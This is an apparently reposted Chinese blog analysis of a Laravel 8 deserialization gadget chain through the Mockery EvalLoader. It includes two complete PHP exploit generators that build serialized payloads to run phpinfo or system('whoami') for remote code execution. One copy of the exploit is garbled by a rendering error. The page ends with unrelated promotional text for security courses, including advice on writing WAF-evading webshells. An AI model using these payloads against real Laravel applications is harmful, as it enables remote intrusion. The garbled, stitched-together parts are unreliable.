Laravel 8 反序列化分析

forward

laravel的版本已经到了8；这里分析一个laravel8的反序列化漏洞，但是让我感到意外的是，这个漏洞竟然在低版本的laravel上依然可以存在，从根本来说这个漏洞是laravel的mockery组件漏洞，没想到一直没修；

本文涉及知识点实操练习：[Fastjson反序列化漏洞](https://www.hetianlab.com/expc.do?ec=ECID49a7-7e01-41dd-9edd-c051743c427f&pk_campaign=freebuf-
wemedia)（Fastjson是阿里巴巴公司开源的一款json解析器，在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。）

text

首先还是老样子，熟悉laravel的pop链的师傅肯定比较熟悉，入口点还是PendingBroadcast.php中的析构函数；

public function __destruct()
{
    $this->events->dispatch($this->event);
}

这里很明显可以控制任意类下的dispatch函数；这里还是选择Dispatcher.php进行续链；

public function dispatch($command)
{
    return $this->queueResolver && $this->commandShouldBeQueued($command)
                    ? $this->dispatchToQueue($command)
                    : $this->dispatchNow($command);
}

这里简单的看下源码，感兴趣的师傅可以拿着laravel5的源码来进行对比，这里只不过是写成了三元运算的形式，本质上还是一样的，我们控制queueResolver变量和commandShouldBeQueued函数，使其返回为真，这样就可进入dispatchToQueue函数；这里审计下类不难发现queueResolver是我们可控的变量，然而commandShouldBeQueued函数我们可以追溯一下；

protected function commandShouldBeQueued($command)
{
    return $command instanceof ShouldQueue;
}

这里不难发现，是需要我们的command是继承ShouldQueue接口的类就可；所以全局搜索；选择BroadcastEvent.php的类；然后便可返回true，然后进入dispatchToQueue函数；回溯一下dispatchToQueue函数；

public function dispatchToQueue($command)
    {
        $connection = $command->connection ?? null;

        $queue = call_user_func($this->queueResolver, $connection);

可以发现这里有个危险函数call_user_func；可以直接实现任意类下的任意方法；这里就可直接跳转到我们想要执行的方法下；全局搜索一下eval方法；发现存在；

class EvalLoader implements Loader
{
    public function load(MockDefinition $definition)
    {
        if (class_exists($definition->getClassName(), false)) {
            return;
        }

        eval("?>" . $definition->getCode());
    }
}

call_user_func函数在第一个参数为数组的时候，第一个参数就是我们选择的类，第二个参数是类下的方法；所以这里直接去到EvalLoader类，去执行load方法从而调用到eval函数；这里发现存在参数，而且参数必须是MockDefinition类的实例；也即是意味着我们connection需要为MockDefinition类的实例；

继续审计发现，必须if为false才会触发eval方法；所以这里我们需要直接追溯到MockDefinition类中；

class MockDefinition
{
    protected $config;
    protected $code;

    public function __construct(MockConfiguration $config, $code)
    {
        if (!$config->getName()) {
            throw new \InvalidArgumentException("MockConfiguration must contain a name");
        }
        $this->config = $config;
        $this->code = $code;
    }

    public function getConfig()
    {
        return $this->config;
    }

    public function getClassName()
    {
        return $this->config->getName();
    }
    public function getCode()
    {
        return $this->code;
    }
}

看下getClassName函数；这里的config是可控的，所以我们直接找到一个存在getName方法并且可控该方法的类；全局搜索下找到MockConfiguration.php可以实现；

protected $name;
    public function getName()
    {
        return $this->name;
    }

因为最后是要经过class_exit函数的判断的，所以我们可以直接控制其返回一个不存在的类，就会造成false从而进入eval方法；继续回到eval方法；

class EvalLoader implements Loader
{
    public function load(MockDefinition $definition)
    {
        if (class_exists($definition->getClassName(), false)) {
            return;
        }

        eval("?>" . $definition->getCode());
    }
}

这里还有个getCode方法，我们通过上面的类也可审计getCode方法；code在MockDefinition类中也是可控的，所以我们可以随意的控制其内容，那么我们就可命令执行；放出我exp：

<?php

namespace Illuminate\Broadcasting{

use Illuminate\Contracts\Events\Dispatcher;

class PendingBroadcast
{
	protected $event;
	protected $events;
    public function __construct($events, $event)
    {
        $this->event = $event;
        $this->events = $events;
    }
}
}
namespace Illuminate\Bus{
class Dispatcher
{
	protected $queueResolver;
    public function __construct($queueResolver)
    {
        $this->queueResolver = $queueResolver;
    }

}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
	public $connection;
	public function __construct($connection)
    {
        $this->connection = $connection;
    }
		}
}

namespace Mockery\Loader{

use Mockery\Generator\MockDefinition;
class EvalLoader
{
	    public function load(MockDefinition $definition)
    {}
}
}
namespace Mockery\Generator{
class MockConfiguration
{	
protected $name;
	public function __construct($name){

	$this->name = $name;
}
}


}
namespace Mockery\Generator{

class MockDefinition
{
	protected $config;
	protected $code;
	public function __construct($config,$code)
    {
    	$this->config = $config;
    	$this->code = $code;
    }
}
}
namespace{
	$e = new Mockery\Generator\MockConfiguration('s1mple');
	$d = new Mockery\Loader\EvalLoader();
	$f = new Mockery\Generator\MockDefinition($e,'<?php phpinfo();?>');
	$c = new Illuminate\Broadcasting\BroadcastEvent($f);
	$a = new Illuminate\Bus\Dispatcher(array($d,"load"));
	$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
	echo urlencode(serialize($b));
}

这里为了节省时间，我最后用abcdef直接代替了，造成rce；

细心的师傅想必也发现了；在最开始的call_user_func处，也是可以进行命令执行的；

public function dispatchToQueue($command)
    {
        $connection = $command->connection ?? null;

        $queue = call_user_func($this->queueResolver, $connection);

这里可以直接控制进行命令执行；这个很简单，就直接放出我exp吧；

<?php

namespace Illuminate\Broadcasting{

use Illuminate\Contracts\Events\Dispatcher;

class PendingBroadcast
{
	protected $event;
	protected $events;
    public function __construct($events, $event)
    {
        $this->event = $event;
        $this->events = $events;
    }
}
}
namespace Illuminate\Bus{
class Dispatcher
{
	protected $queueResolver;
    public function __construct($queueResolver)
    {
        $this->queueResolver = $queueResolver;
    }

}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
	public $connection;
	public function __construct($connection)
    {
        $this->connection = $connection;
    }
		}
}
namespace{
	$c = new Illuminate\Broadcasting\BroadcastEvent('whoami');
	$a = new Illuminate\Bus\Dispatcher('system');
	$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
	echo urlencode(serialize($b));
}

namespace{
$c = new Illuminate\Broadcasting\BroadcastEvent(‘whoami’);
$a = new Illuminate\Bus\Dispatcher(‘system’);
KaTeX parse error: Undefined control sequence: \Broadcasting at position 19: … new Illuminate\̲B̲r̲o̲a̲d̲c̲a̲s̲t̲i̲n̲g̲\PendingBroadca…a,$c);echourlencode(serialize($b));
}

[外链图片转存中…(img-N7LhTuIw-1691821163798)]

学习网络安全技术的方法无非三种:

第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。

第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，可能很长一段时间感觉自己没有进步，容易劝退。

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

第三种就是去找培训。

接下来，我会教你零基础入门快速入门上手网络安全。

网络安全入门到底是先学编程还是先学计算机基础？这是一个争议比较大的问题，有的人会建议先学编程，而有的人会建议先学计算机基础，其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说，学习编程或者计算机基础对他们来说都有一定的难度，并且花费时间太长。

第一阶段：基础准备 4周~6周

这个阶段是所有准备进入安全行业必学的部分，俗话说：基础不劳，地动山摇

第二阶段：web渗透

学习基础 时间：1周 ~ 2周：

① 了解基本概念：（SQL注入、XSS、上传、CSRF、一句话木马、等）为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透，学一学案例的思路，每一个站点都不一样，所以思路是主要的。
③ 学会提问的艺术，如果遇到不懂得要善于提问。

配置渗透环境 时间：3周 ~ 4周：

① 了解渗透测试常用的工具，例如（AWVS、SQLMAP、NMAP、BURP、中国菜刀等）。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景，懂得基本的使用，推荐在Google上查找。

渗透实战操作 时间：约6周：

① 在网上搜索渗透实战案例，深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试，推荐DWVA，SQLi-labs，Upload-labs，bWAPP。
③ 懂得渗透测试的阶段，每一个阶段需要做那些动作：例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入，寻找绕过waf的方法，制作自己的脚本。
⑤ 研究文件上传的原理，如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用（IIS、Nignix、Apache）等，参照：上传攻击框架。
⑥ 了解XSS形成原理和种类，在DWVA中进行实践，使用一个含有XSS漏洞的cms，安装安全狗等进行测试。
⑦ 了解一句话木马，并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限，Google关键词：提权

以上就是入门阶段

第三阶段：进阶

已经入门并且找到工作之后又该怎么进阶？详情看下图

给新手小白的入门建议：
新手入门学习最好还是从视频入手进行学习，视频的浅显易懂相比起晦涩的文字而言更容易吸收，这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦！

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！